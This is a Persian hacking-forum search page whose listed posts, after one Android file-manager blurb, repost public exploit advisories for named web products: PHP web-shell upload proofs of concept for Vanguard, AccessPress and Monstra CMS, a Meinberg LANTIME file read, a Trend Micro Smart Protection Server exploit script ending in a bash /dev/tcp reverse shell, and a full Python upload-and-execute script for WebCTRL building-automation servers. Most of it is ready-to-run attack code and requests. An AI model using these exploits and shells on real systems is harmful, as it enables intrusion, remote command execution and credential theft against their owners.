رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'file'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

56 نتیجه پیدا شد

  1. Soft-Android

    ES File Explorer File Manager نرم افزار مدیریت فایل ها برای گوشی و تبلت شما . این نرم افزار که بیش از ۱۰ میلیون کاربر دارد، یکی از محبوب ترین نرم افزار ها نزد کاربران اندروید به حساب می آید و دارای امکانات بسیار زیادی است که در اینجا به چند مورد از آنها اشاره خواهیم کرد. برخی امکانات ES File Explorer File Manager کپی، پیست، کات، جا به جایی، جستجو، ارسال و به اشتراک گذاشتن فایلها نصب ، حذف و پشتیبان گیری از برنامه ها فشرده سازی و استخراج فایل های فشرده (ZIP) باز کردن فایلهای RAR مشاهده ی فرمت های مختلف عکس ها ، فیلم ها و اسناد جهت دانلود این نرم افزار برای اندروید برروی لینک زیر کلیک کنید ES File Explorer File Manager - Apps on Google Play
  2. Hacking

    # # # # # # Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload # Dork: N/A # Date: 11.12.2017 # Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio # Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825 # Demo: http://vanguard-demo.esy.es/ # Version: 1.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an users upload arbitrary file.... # # Vulnerable Source: # ..................... # $row = $row->fetch(PDO::FETCH_ASSOC); # $folder_name = $row['id'] * 2; # $folder_name_2 = $folder_name * 5; # $check_dir1 = 'uploads/'.$folder_name; # $check_dir2 = $check_dir.'/'.$folder_name_2; # if (!is_dir($check_dir1)) { mkdir($check_dir1); } # if (!is_dir($check_dir2)) { mkdir($check_dir2); } # $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']); # $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']); # $main_path = $check_dir2."/".basename($_FILES['main_file']['name']); # $error = 0; # $upload_path = './'; # ..................... # # Proof of Concept: # # Users Add a new product/Add a product preview... # # http://localhost/[PATH]/ # http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php # # # # # #
  3. # Exploit Title: Unauthenticated Arbitrary File Upload # Date: November 12, 2017 # Exploit Author: Colette Chamberland # Author contact: [email protected] # Author homepage: https://defiant.com # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446 # Version: < 3.2.0 # Tested on: Wordpress 4.x # CVE : CVE-2017-16949 Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. PoC: POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1 Host:server User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_GET['e'].' 2>&1'); ?> -----------------------------7230359611602921801124357792--
  4. Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read Author: Jakub Palaczynski CVE: CVE-2017-16787 Exploit tested on: ================== Meinberg LANTIME Web Configuration Utility 6.16.008 Vulnerability affects: ====================== All LTOS6 firmware releases before 6.24.004 Vulnerability: ************** Arbitrary File Read: ==================== It is possible to read arbitrary file on the system with root permissions Proof of Concept: First instance: https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx Info-User user is able to read any file on the system with root permissions. Second instance: User with Admin-User access is able to read any file on the system via firmware update functionality. Curl accepts "file" schema which actually downloads file from the filesystem. Then it is possible to download /upload/update file which contains content of requested file. Contact: ======== Jakub[dot]Palaczynski[at]gmail[dot]com
  5. Exploit Title: Monstra CMS - 3.0.4 RCE Vendor Homepage: http://monstra.org/ Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip Discovered by: Ishaq Mohammed Contact: https://twitter.com/security_prince Website: https://about.me/security-prince Category: webapps Platform: PHP Advisory Link: https://blogs.securiteam.com/index.php/archives/3559 Description: MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a remote command execution on the remote server. Vulnerable Code: https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php line 19: public static function main() { // Array of forbidden types $forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4', 'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty'); Proof of Concept Steps to Reproduce: 1. Login with a valid credentials of an Editor 2. Select Files option from the Drop-down menu of Content 3. Upload a file with PHP (uppercase)extension containing the below code: <?php $cmd=$_GET['cmd']; system($cmd); ?> 4. Click on Upload 5. Once the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc. Recommended Patch: We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support – though this is not an official status on their site (last official patch was released on 2012-11-29), the GitHub appears a bit more active (last commit from 2 years ago). The patch that addresses this bug is available here: https://github.com/monstra-cms/monstra/issues/426
  6. # Trend Micro Smart Protection Server Multiple Vulnerabilities ## 1. Advisory Information **Title:**: Trend Micro Smart Protection Server Multiple Vulnerabilities **Advisory ID:** CORE-2017-0008 **Advisory URL:** http://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities **Date published:** 2017-12-19 **Date of last update:** 2017-12-11 **Vendors contacted:** Trend Micro **Release mode:** Coordinated release ## 2. Vulnerability Information **Class:** Information Exposure Through Log Files [[CWE-532](http://cwe.mitre.org/data/definitions/532.html)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](http://cwe.mitre.org/data/definitions/78.html)], Improper Control of Filename for Include/Require Statement in PHP Program [[CWE-98](http://cwe.mitre.org/data/definitions/98.html)], Improper Neutralization of Input During Web Page Generation [[CWE-79](http://cwe.mitre.org/data/definitions/79.html)], Improper Authorization [[CWE-285](http://cwe.mitre.org/data/definitions/285.html)] **Impact:** Code execution **Remotely Exploitable:** Yes **Locally Exploitable:** Yes **CVE Name:** [CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398), [CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094), [CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095), [CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096), [CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097) ## 3. Vulnerability Description Trend Micro's website states that: Trend Micro Smart Protection Server [(http://cwe.mitre.org/data/definitions/532.html)(https://www.coresecurity.com#SPS)] is a next-generation, in-the-cloud based, advanced protection solution. At the core of this solution is an advanced scanning architecture that leverages malware prevention signatures that are stored in-the-cloud. This solution leverages file reputation and Web reputation technology to detect security risks. The technology works by off loading a large number of malware prevention signatures and lists that were previously stored on endpoints to Trend Micro Smart Protection Server. Multiple vulnerabilities were found in the Smart Protection Server's Administration UI that would allow a remote unauthenticated attacker to execute arbitrary commands on the system. ## 4. Vulnerable Packages * Trend Micro Smart Protection Server 3.2 (Build 1085) Other products and versions might be affected, but they were not tested. ## 5. Vendor Information, Solutions and Workarounds Trend Micro published the following patches: * TMSPS3.0 - Critical Patch B1354 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4556®s=NABU&lang_loc=1#fragment-4628)) * TMSPS3.1 - Critical Patch B1057 ([link](http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=4974®s=NABU&lang_loc=1#fragment-5030)) ## 6. Credits These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. ## 7. Technical Description / Proof of Concept Code In section 7.1 we describe how an unauthenticated attacker could get a session token to perform authenticated requests against the application. Sections 7.2 and 7.3 describe two vectors to achieve remote command execution in the context of the Web application. Several public privilege escalation vulnerabilities exist that are still unpatched. In combination with the aforementioned vulnerabilities a remote unauthenticated attacker would be able to execute arbitrary system commands with root privileges. Sections 7.4 and 7.5 cover other common Web application vulnerabilities found in the product's console. ### 7.1 Session hijacking via log file disclosure [[CVE-2017-11398](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11398)] The application stores diagnostic logs in the /widget/repository/log/diagnostic.log file. Performing a login or some basic browsing will write several entries with the following format: ``` 2017-08-18 17:00:38,468,INFO,rti940901j0556161dudhj6805,null, Notice: Undefined index: param in /var/www/AdminUI/widget/inc/class/common/db/GenericDao.php on line 218 ``` Each log entry leaks the associated session ID next to the log alert level and can be accessed via HTTP without authenticating to the Web application. Therefore, an unauthenticated attacker can grab this file and hijack active user sessions to perform authenticated requests. ### 7.2 Remote command execution via cron job injection [[CVE-2017-14094](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14094)] The script admin_update_program.php is responsible for creating a cron job when software updates are scheduled. The HTTP request contains several parameters that are used without sanitization as part of the cron job created at /var/spool/cron/webserv. We will target the hidTimingMin parameter. File /var/www/AdminUI/php/admin_update_program.php: ``` if ($_SERVER['REQUEST_METHOD'] == 'POST'){ [...] $arr_au['Program']['AUScheduleTimingMin']= isset($_POST["hidTimingMin"])?$_POST["hidTimingMin"]:"0"; [...] if ( $arr_au['Program']['UseAUSchedule'] == "1"){ if ( $arr_au['Program']['AUScheduleType'] == "0" ){ $crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", "*"); }else { $crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", $arr_au['Program']['AUScheduleTimingDay']); } $crontab->setCommand("/usr/tmcss/bin/UpdateManage.exe --Program --Schedule > /dev/null 2>&1"); $crontab->saveCronFile(); } if(! $crontab->addToCrontab()){ header( 'Location: admin_update_program.php?status=savecrontaberror&sid='.$session_name ) ; exit; } ``` File /var/www/AdminUI/php/inc/crontab.php: ``` function setDateParams($min=NULL, $hour=NULL, $day=NULL, $month=NULL, $dayofweek=NULL){ if($min=="0") $this->minute=0; elseif($min) $this->minute=$min; else $this->minute="*"; if($hour=="0") $this->hour=0; elseif($hour) $this->hour=$hour; else $this->hour="*"; $this->month=($month) ? $month : "*"; $this->day=($day) ? $day : "*"; $this->dayofweek=($dayofweek != NULL) ? $dayofweek : "*"; } function saveCronFile(){ $command=$this->minute." ".$this->hour." ".$this->day." ".$this->month." ".$this->dayofweek." ".$this->command."n"; if(!fwrite($this->handle, $command)) return true; else return false; } function addToCrontab(){ if(!$this->filename) exit('No name specified for cron file'); $data=array(); exec("crontab ".escapeshellarg($this->directory.$this->filename),$data,$ret); if($ret==0) return true; else return false; } ``` The following python script creates a cron job that will run an arbitrary command on every minute. It also leverages the session hijacking vulnerability described in 7.1 to bypass the need of authentication. ``` #!/usr/bin/env python import requests import sys def exploit(host, port, command): session_id = get_session_id(host, port) print "[+] Obtained session id %s" % session_id execute_command(session_id, host, port, command) def get_session_id(host, port): url = "https://%s:%d/widget/repository/log/diagnostic.log" % (host, port) r = requests.get(url, verify=False) for line in r.text.split('n')[::-1]: if "INFO" in line or "ERROR" in line: return line.split(',')(http://cwe.mitre.org/data/definitions/98.html) def execute_command(session_id, host, port, command): print "[+] Executing command '%s' on %s:%d" % (command, host, port) url = "https://%s:%d/php/admin_update_program.php?sid=%s" % (host, port, session_id) multipart_data = { "ComponentSchedule": "on", "ComponentScheduleOS": "on", "ComponentScheduleService": "on", "ComponentScheduleWidget": "on", "useAUSchedule": "on", "auschedule_setting": "1", "update_method": "1", "update_method3": "on", "userfile": "", "sid": session_id, "hidComponentScheduleOS": "1", "hidComponentScheduleService": "1", "hidComponentScheduleWidget": "1", "hidUseAUSchedule": "1", "hidScheduleType": "1", "hidTimingDay": "2", "hidTimingHour": "2", "hidTimingMin": "* * * * * %s #" % command, "hidUpdateOption": "1", "hidUpdateNowFlag": "" } r = requests.post(url, data=multipart_data, cookies={session_id: session_id}, verify=False) if "MSG_UPDATE_UPDATE_SCHEDULE" in r.text: print "[+] Cron job added, enjoy!" else: print "[-] Session has probably timed out, try again later!" if __name__ == "__main__": exploit(sys.argv(http://cwe.mitre.org/data/definitions/532.html), int(sys.argv(http://cwe.mitre.org/data/definitions/78.html)), sys.argv(http://cwe.mitre.org/data/definitions/98.html)) ``` The following proof of concept opens a reverse shell to the attacker's machine. ``` $ python coso.py 192.168.45.186 4343 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' [+] Obtained session id q514un6ru6stcpf3k0n4putbd3 [+] Executing command 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' on 192.168.45.186:4343 [+] Cron job added, enjoy! $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.45.186] port 8888 [tcp/*] accepted (family 2, sport 59508) bash: no job control in this shell [[email protected] localhost ~]$ ``` ### 7.3 Remote command execution via local file inclusion [[CVE-2017-14095](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14095)] The /widget/inc/widget_package_manager.php script passes user provided input to the PHP require_once function without sanitization. However, there are some restrictions that need to be overcome in order to include arbitrary files, as the application appends PoolManager.php at the end of the filename. File /var/www/AdminUI/widget/inc/widget_package_manager.php: ``` switch($widgetRequest['act']){ case "check": try{ // $strUpdateType = widget, configure_widget_and_widget_component $strUpdateType = isset($widgetRequest['update_type']) ? $widgetRequest['update_type'] : 'widget'; $strFuncName = 'is'.WF::getTypeFactory()->getString()->getUpperCamelCase($strUpdateType).'Update'; $isUpdate = WF::getWidgetPoolFactory()->getWidgetPoolManager($strUpdateType)->$strFuncName(); [...] ``` File /var/www/AdminUI/widget/inc/class/widgetPool/WidgetPoolFactory.abstract.php: ``` public function getWidgetPoolManager($strUpdateType = 'widget'){ if(! isset(self::$instance[__FUNCTION__][$strUpdateType])){ $strFileName = $this->objFramework->getTypeFactory()->getString()->getUpperCamelCase($strUpdateType); require_once (self::getDirnameFile() . '/widget/'.$strFileName.'PoolManager.php'); $strClassName = 'WF'.$strFileName.'PoolManager'; self::$instance[__FUNCTION__][$strUpdateType] = new $strClassName($this->objFramework); } return self::$instance[__FUNCTION__][$strUpdateType]; } ``` One way for an attacker to place an arbitrary file on the system is to abuse the update process that can be managed from the same product console. Files downloaded from alternate update sources are stored in the /var/tmcss/activeupdate directory. An attacker can setup a fake update server and trigger an update from it to download the malicious archive. As an example, we have packed a reverse shell named rshellPoolManager.php into the bf1747402402.zip archive. The following server.ini would instruct the application to download the archive and uncompress it inside /var/tmcss/activeupdate: ``` ; ======================================= ; ActiveUpdate 1.2 US ; ; Filename: Server.ini ; ; New Format AU 1.8 ; ; Last modified by AUJP1 10/14/2015 ; ======================================= [Common] Version=1.2 CertExpireDate=Jul 28 08:52:40 2019 GMT [Server] AvailableServer=1 Server.1=http://<serverIP>:1080/ AltServer=http://<serverIP>:1080/ Https=http://<serverIP>:1080/ [PATTERN] P.48040039=pattern/bf1747402402.zip,1747402402,257 ``` After triggering an update from the Web console, the PHP script is written to the expected location. ``` [[email protected] localhost activeupdate]# ls -lha /var/tmcss/activeupdate/ | grep php -rw-r--r--. 1 webserv webserv 66 ago 25 22:59 rshellPoolManager.php ``` The final step is to include the script and execute our payload. ``` POST /widget/inc/widget_package_manager.php?sid=dj0efdmskngvt4lbhakgc6cru7 HTTP/1.1 Host: 192.168.45.186:4343 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: application/json Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Request: JSON X-CSRFToken: dj0efdmskngvt4lbhakgc6cru7 Content-Type: application/json; charset=utf-8 Content-Length: 122 Cookie: dj0efdmskngvt4lbhakgc6cru7=dj0efdmskngvt4lbhakgc6cru7 Connection: close {"act": "check", "update_type": "../../../../../../../../../var/tmcss/activeupdate/rshell"} ``` Steven Seeley and Roberto Suggi Liverani presented various privilege escalation vectors to move from webserv to root on their presentation "I Got 99 Trends and a # Is All Of Them". Based on our testing the attacks remain unpatched, so we did not try to find additional ways to escalate privileges. ### 7.4 Stored cross-site scripting [[CVE-2017-14096](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14096)] The ru parameter of the wcs_bwlists_handler.php script is vulnerable to cross-site scripting. This endpoint is used to manage user defined URLs. After the rule is inserted, the payload will be executed every time the user opens the user defined URLs section. The following proof of concept stores code to open an alert box. ``` https://<serverIP>:4343/php/wcs_bwlists_handler.php?sid=2f03bf97fc4912ee&req=mgmt_insert&st=1&ac=0&ru=http%3A%2F%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E&rt=3&ipt=0&ip4=&ip4m=128&cn=&dn= ``` ### 7.5 Improper access control [[CVE-2017-14097](http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14097)] The product console includes widgets that can be used to monitor other servers. Credentials to access the servers being monitored, widget logs and other information reside on a SQLite database which can be accessed without authentication at the following URL: ``` https://<serverIP>:4343/widget/repository/db/sqlite/tmwf.db ``` The credentials are stored using AES256 with a dynamic key. However, the key is also placed inside the Web server directories and available for download without authentication. ``` https://<serverIP>:4343/widget/repository/inc/class/common/crypt/crypt.key ``` This would allow an attacker to decrypt the contents of the database, rendering the encryption mechanism useless. ## 8 Report Timeline * **2017-09-04: **Core Security sent an initial notification to Trend Micro, including a draft advisory. * **2017-10-02: **Core Security asked for an update on the vulnerability reported. * **2017-10-02: ** Trend Micro stated they are still in the process of creating the official fix for the vulnerabilities reported. ETA for the fix should be end of this month (October) * **2017-11-13: **Core Security requested a status on the timeline for fixing the reported vulnerabilities since the original ETA was not accomplished. * **2017-11-14: ** Trend Micro stated they are still working on the Critical Patch and found problems along the way. Patch is now in QA. * **2017-11-20: ** Trend Micro informed availability for the fixes addressing 5 out of the 6 vulnerabilities reported. They stated one of the reported vulnerabilities is on a table where the SQL query is allowed and 'does not cause anything leaking'. Still in the process of localizing the critical patches for other regions. Will let us know when everything is covered in order to set a disclosure date. * **2017-11-21: **Core Security thanked the update and agreed on removing one of the reported vulnerabilities. * **2017-12-05: ** Trend Micro provided the CVE-ID for all the vulnerabilities reported and proposed the public disclosure date to be December 14th. * **2017-12-06: **Core Security thanked the update and proposed public disclosure date to be Tuesday December 19th @ 12pm EST. * **2017-12-19: ** Advisory CORE-2017-0008 published. ## 9 References http://cwe.mitre.org/data/definitions/532.html ## 10 About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: . ## 11 About Core Security Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [[email protected]](mailto:info%40coresecurity.com) ## 12 Disclaimer The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:
  7. Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write Vendor: Automated Logic Corporation Product web page: http://www.automatedlogic.com Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior ALC WebCTRL, i-Vu 6.0 and prior ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior Summary: WebCTRL®, Automated Logic's web-based building automation system, is known for its intuitive user interface and powerful integration capabilities. It allows building operators to optimize and manage all of their building systems - including HVAC, lighting, fire, elevators, and security - all within a single HVAC controls platform. It's everything they need to keep occupants comfortable, manage energy conservation measures, identify key operational problems, and validate the results. Desc: The vulnerability is triggered by an authenticated user that can use the manualcommand console in the management panel of the affected application. The ManualCommand() function in ManualCommand.js allows users to perform additional diagnostics and settings overview by using pre-defined set of commands. This can be exploited by using the echo command to write and/or overwrite arbitrary files on the system including directory traversal throughout the system. Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601) Apache-Coyote/1.1 Apache Tomcat/7.0.42 CJServer/1.1 Java/1.7.0_25-b17 Java HotSpot Server VM 23.25-b01 Ant 1.7.0 Axis 1.4 Trove 2.0.2 Xalan Java 2.4.1 Xerces-J 2.6.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5430 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php CVE ID: CVE-2017-9640 CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9640 30.01.2017 -- PoC: GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1 Host: TARGET --- GET http://TARGET/touch.txt HTTP/1.1 peend
  8. #!/usr/bin/env python # -*- coding: utf8 -*- # # # Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution # # # Vendor: Automated Logic Corporation # Product web page: http://www.automatedlogic.com # Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior # ALC WebCTRL, SiteScan Web 6.1 and prior # ALC WebCTRL, i-Vu 6.0 and prior # ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior # ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior # # Summary: WebCTRL®, Automated Logic's web-based building automation # system, is known for its intuitive user interface and powerful integration # capabilities. It allows building operators to optimize and manage # all of their building systems - including HVAC, lighting, fire, elevators, # and security - all within a single HVAC controls platform. It's everything # they need to keep occupants comfortable, manage energy conservation measures, # identify key operational problems, and validate the results. # # Desc: WebCTRL suffers from an authenticated arbitrary code execution # vulnerability. The issue is caused due to the improper verification # when uploading Add-on (.addons or .war) files using the uploadwarfile # servlet. This can be exploited to execute arbitrary code by uploading # a malicious web archive file that will run automatically and can be # accessed from within the webroot directory. Additionaly, an improper # authorization access control occurs when using the 'anonymous' user. # By specification, the anonymous user should not have permissions or # authorization to upload or install add-ons. In this case, when using # the anonymous user, an attacker is still able to upload a malicious # file via insecure direct object reference and execute arbitrary code. # The anonymous user was removed from version 6.5 of WebCTRL. # # Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601) # Apache-Coyote/1.1 # Apache Tomcat/7.0.42 # CJServer/1.1 # Java/1.7.0_25-b17 # Java HotSpot Server VM 23.25-b01 # Ant 1.7.0 # Axis 1.4 # Trove 2.0.2 # Xalan Java 2.4.1 # Xerces-J 2.6.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2017-5431 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5431.php # # ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01 # CVE ID: CVE-2017-9650 # CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9650 # # # 30.01.2017 # # import itertools import mimetools import mimetypes import cookielib import binascii import urllib2 import urllib import sys import re import os from urllib2 import URLError global bindata __author__ = 'lqwrm' piton = os.path.basename(sys.argv[0]) def bannerche(): print ''' @[email protected] | | | WebCTRL 6.5 Authenticated RCE PoC | | ID: ZSL-2017-5431 | | Copyleft (c) 2017, Zero Science Lab | | | @[email protected] ''' if len(sys.argv) < 3: print '[+] Usage: '+piton+' <IP> <WAR FILE>' print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n' sys.exit() bannerche() host = sys.argv[1] filename = sys.argv[2] with open(filename, 'rb') as f: content = f.read() hexo = binascii.hexlify(content) bindata = binascii.unhexlify(hexo) cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) print '[+] Probing target http://'+host try: checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en') except urllib2.HTTPError, errorzio: if errorzio.code == 404: print '[!] Error 001:' print '[-] Check your target!' print sys.exit() except URLError, errorziocvaj: if errorziocvaj.reason: print '[!] Error 002:' print '[-] Check your target!' print sys.exit() print '[+] Target seems OK.' print '[+] Login please:' print ''' Default username: Administrator, Anonymous Default password: (blank), (blank) ''' username = raw_input('[*] Enter username: ') password = raw_input('[*] Enter password: ') login_data = urllib.urlencode({'pass':password, 'name':username, 'touchscr':'false'}) opener.addheaders = [('User-agent', 'Thrizilla/33.9')] login = opener.open('http://'+host+'/?language=en', login_data) auth = login.read() if re.search(r'productName = \'WebCTRL', auth): print '[+] Authenticated!' token = re.search('wbs=(.+?)&', auth).group(1) print '[+] Got wbs token: '+token cookie1, cookie2 = [str(c) for c in cj] cookie = cookie1[8:51] print '[+] Got cookie: '+cookie else: print '[-] Incorrect username or password.' print sys.exit() print '[+] Sending payload.' class MultiPartForm(object): def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary def add_field(self, name, value): self.form_fields.append((name, value)) return def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return def __str__(self): parts = [] part_boundary = '--' + self.boundary parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields ) parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files ) flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened) if __name__ == '__main__': form = MultiPartForm() form.add_field('wbs', token) form.add_field('file"; filename="'+filename, bindata) request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile') request.add_header('User-agent', 'SCADA/8.0') body = str(form) request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookie) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read() print '[+] Payload uploaded.' print '[+] Shell available at: http://'+host+'/'+filename[:-4] print sys.exit()
  9. Hacking

